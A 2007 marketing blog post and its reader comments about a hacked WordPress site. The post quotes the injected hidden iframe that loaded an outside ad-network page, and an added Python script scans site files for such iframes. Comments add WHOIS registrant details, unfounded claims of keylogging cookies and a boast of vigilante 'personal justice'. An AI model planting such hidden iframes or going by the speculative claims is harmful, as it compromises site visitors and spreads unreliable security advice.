ClickNewz! Internet Marketing Blog

Hacked, Fixed, Email/Feed Issues Resolved

October 16th, 2007 · 17 Comments ·


Good Grief :roll:

I sent out an email to some of my readers this morning as I noticed my Feed Broadcaster was no longer working, and wanted to make sure it wasn't just on my end. It wasn't.

Thanks to everyone who responded, by the way - you guys are great! It was Patty Gale who offered an idea that led to the solution, so I logged into FeedBurner to check things out…

It turns out my feed wouldn't “validate”. It even told me why, which I didn't really understand. But it did point out the piece of code causing the problem:

[iframe name="StatPage" src="http://banner-network.hk/ppc/index.php" width=5 height=5 style="display:none"][/iframe]

Hmmm. Now I know I didn't put that there :-?

Next Step: do a search on Google using a string of that code to see if anyone else is discussing it online anywhere. I chose |iframe name="StatPage"| and pasted that into the search bar, which returned this topic on WordPress Support.

Scanning the discussion I see the word “hacked” ( :shock: - not good). Keep scanning and see the 5th message down, which says:

Check your main index.php file and see if it was modified.

I open my FTP program, log on to my hosting account, look in the root directory, and open the index.php file. Bingo! There it is…

I removed the code, saved the file, and went back to FeedBurner’s troubleshooting section. This time my feed validated (yay!).

In the case that something like this ever happens to you, these troubleshooting steps might come in handy. Don't panic. Just identify the problem, all of the possible sources of that problem, and search on Google for the solution.

Chances are, nothing will happen to you (or your sites) that hasn't already happened to someone else first ;)

To state the obvious, we’re back up and running again. So for those of you that were getting an error in Bloglines, in your feed reader, were missing the email notifications, etc… everything should be working just fine now.

Best,

Tags: RSS & Blogging
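
The check described in the post (finding an injected, invisible iframe in index.php) can be run across a whole copy of the site instead of one file at a time. The following is an added example, not part of the original post: the function names, the file-extension list, the 5-pixel threshold and the sample files are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# "[" is accepted as well as "<" because the post displays the injected tag in bracket form.
IFRAME_RE = re.compile(r'[<\[]\s*iframe\b([^>\]]*)[>\]]', re.IGNORECASE)
ATTR_RE = re.compile(r'''([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>\]]+))''')
SCAN_EXT = {'.php', '.html', '.htm', '.js', '.tpl'}  # assumed list of template file types

def parse_attrs(raw):
    return {n.lower(): dq or sq or bare for n, dq, sq, bare in ATTR_RE.findall(raw)}

def is_hidden(attrs):
    # Hidden by CSS, or shrunk to a few pixels like the width=5 height=5 tag in the post.
    style = attrs.get('style', '').replace(' ', '').lower()
    dims = [attrs.get(d, '').rstrip('px') for d in ('width', 'height')]
    return ('display:none' in style or 'visibility:hidden' in style
            or any(v.isdigit() and int(v) <= 5 for v in dims))

def find_hidden_iframes(text, trusted_hosts=()):
    """Return (line number, host) for every hidden iframe that loads an external host."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in IFRAME_RE.finditer(line):
            attrs = parse_attrs(m.group(1))
            host = (urlparse(attrs.get('src', '')).hostname or '').lower()
            if host and host not in trusted_hosts and is_hidden(attrs):
                hits.append((lineno, host))
    return hits

def scan_tree(root, trusted_hosts=()):
    report = {}
    for path in sorted(Path(root).rglob('*')):
        if path.is_file() and path.suffix.lower() in SCAN_EXT:
            hits = find_hidden_iframes(path.read_text(encoding='utf-8', errors='replace'), trusted_hosts)
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

def demo():
    # Constructed sample webroot: a tampered index.php and a page with a normal, visible embed.
    files = {'index.php': '<?php /* sample */ ?>\n<iframe name="StatPage" '
                          'src="http://banner-network.hk/ppc/index.php" width=5 height=5 '
                          'style="display:none"></iframe>\n',
             'about.html': '<iframe src="https://video.example.com/e/1" width="560"></iframe>\n'}
    with tempfile.TemporaryDirectory() as root:
        for name, body in files.items():
            Path(root, name).write_text(body, encoding='utf-8')
        return scan_tree(root)
```

Run `scan_tree()` against a downloaded copy of the site and pass any hosts you embed on purpose as `trusted_hosts`; every file it reports should be compared with a known-good backup, since a modified file means the access path also needs fixing.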

17 responses so far ↓

  • Nell Taliercio // Oct 16, 2007 at 7:46 pm

    Oh brother. When will people get a life? What a hassle on your end…glad it is fixed, though.

  • Lynn Terry // Oct 16, 2007 at 7:57 pm

    I hear ya!

    Unfortunately once everything was “fixed”, the email updates went out in a batch. I was worried that would happen. My apologies for the 3 emails in a row that everyone received tonight!

  • Patty Gale // Oct 16, 2007 at 9:17 pm

    That’s a bit scary, Lynn.

    I didn’t get a chance to reply to your last email, but I thought it was strange that Feedburner was taking so long to validate the feed. Usually they update in just a few minutes after pinging.

    I’m glad to see it’s resolved. :D

  • Lynn Terry // Oct 16, 2007 at 9:18 pm

    Thank you - and thanks again for the suggestions!

  • Stefani // Oct 16, 2007 at 9:32 pm

    At least you were able to figure it out and fix it. I would probably be at a total loss of figuring it out.

  • Rick Wilson // Oct 16, 2007 at 9:36 pm

    Soooo …

    Someone was trying to run some sort of a banner network file thru your site, it looks like.

    Glad you have it resolved! :D

    Rick Wilson

  • Lynn Terry // Oct 16, 2007 at 9:58 pm

    It would appear so - though it was invisible. How sneaky is that - racking up impressions to provide stats to paying advertisers :|

  • Shannon // Oct 16, 2007 at 11:24 pm

    Ack! Maybe you should have researched the code a little further to try to find out who was benefiting from it and reported them. :)

  • Lynn Terry // Oct 16, 2007 at 11:26 pm

    A good idea ;)

  • Andy Levy-Stevenson // Oct 17, 2007 at 2:38 am

    I’d noticed it was causing your blog pages to hang on load … it even happened during your Web conference yesterday (when you loaded one of your pages to point something out).

    Didn’t realise the code was nefarious … glad you could sort it out.

  • Lynn Terry // Oct 17, 2007 at 6:17 am

    I didn't even associate the two Andy… but you’re right - the mysterious error is gone, so that must have been the case. Thank goodness, because I’m not sure I would have known where to start tracking that down otherwise :P

  • Chris B // Oct 17, 2007 at 10:03 am

    Hi Lynn,

    Here are some stats and info on that problem causer.

    The domain the file is associated with running is registered with:
    https://www.hkdnr.hk/

    From HK (hong kong)

    Their Account Name: HK1917076T

    First name: TIM
    Last name: FLOCK
    Company Name: TIM FLOCK

    DNS:

    NS1.BANNER-NETWORK.HK
    NS2.BANNER-NETWORK.HK
    NS3.BANNER-NETWORK.HK

    Chinese Holder:
    john-lawson1956@doglover.com

    Spoofed Registration:
    21-06-2007

    In this code:

    [iframe name="StatPage" src="http://banner-network.hk/ppc/index.php" width=5 height=5 style="display:none"][/iframe]

    Iframe Name is specifying an action from the file index.php located in the ppc/ directory.

    My guess is StatsPage is made to do two things: 1, track input types on the page this was inserted, and 2, track results and cookie tracking. I highly recommend anyone who has resulted with this in their index file please clean your cookies; there can be a tracking (keylog) cookie inside this index.php file. I have (spoofed getting it) and found this out.

    Glad to help out!

    And actually I had a rough attack from Japan, spoofing every address possible at webdevelopmenttechnology.com. I had over 300 messages sent with out server, I blocked every single one. BUT, lol, if you ain’t got good money, it will be useless to report them, and try to sue or get them jailed. Japan, I even had the address of the fart who done it. I just done some personal justice, he won’t be doing it again.

  • Lynn Terry // Oct 17, 2007 at 10:24 am

    Thank you, Chris! Appreciate the detective work there, and will certainly take your advice ;)

  • Steve Johnson // Oct 17, 2007 at 12:29 pm

    Lynn,

    This is pretty serious, even though it was solved easily. Either your server was hacked, your WordPress install was hacked, or you have a worm or trojan on YOUR computer. Personally, I’d lay odds it’s one of the first two.

    Use a decent search utility and scan your local files for the text used in the iframe. If it appears on your computer in a file, try to determine where the file came from. This will give a clue as to whether you received the file with the iframe in it, or if it was modified after it hit your computer. Regardless of what you find, I would do a full system scan with a GOOD antivirus/spyware scanner, and sooner rather than later.

    Change your admin password for WordPress, and back up your database. It wouldn’t hurt to change your database access password either (you’ll have to update the configuration files for whatever scripts you have that access the db).

    Ask your hosting company for assistance. They may be able to help you determine when/where/how the changes in the file were made.

  • Lynn Terry // Oct 17, 2007 at 12:36 pm

    Thank you, Steve - I have already changed passwords in many of those locations and am tracking down each FTP account I set up for assistants etc at the moment too.

    I just bought a new computer, arrived this morning, so I am going to scan this one, THEN do backups, then reload the O/S to a fresh install, and set up on the new box…

  • The top internet program training mentoring online // Oct 17, 2007 at 2:22 pm

    :) Ah Lynn, I tried to imagine what went in your mind while that moments last?

    Nice for sharing and I will take notice.

  • duncan // Oct 18, 2007 at 1:33 pm

    I’m having big problems at my yahoo e-mail so I’m moving to gmail…Thank-you P.S. I had 7 years of important e-mails go up into the dust..
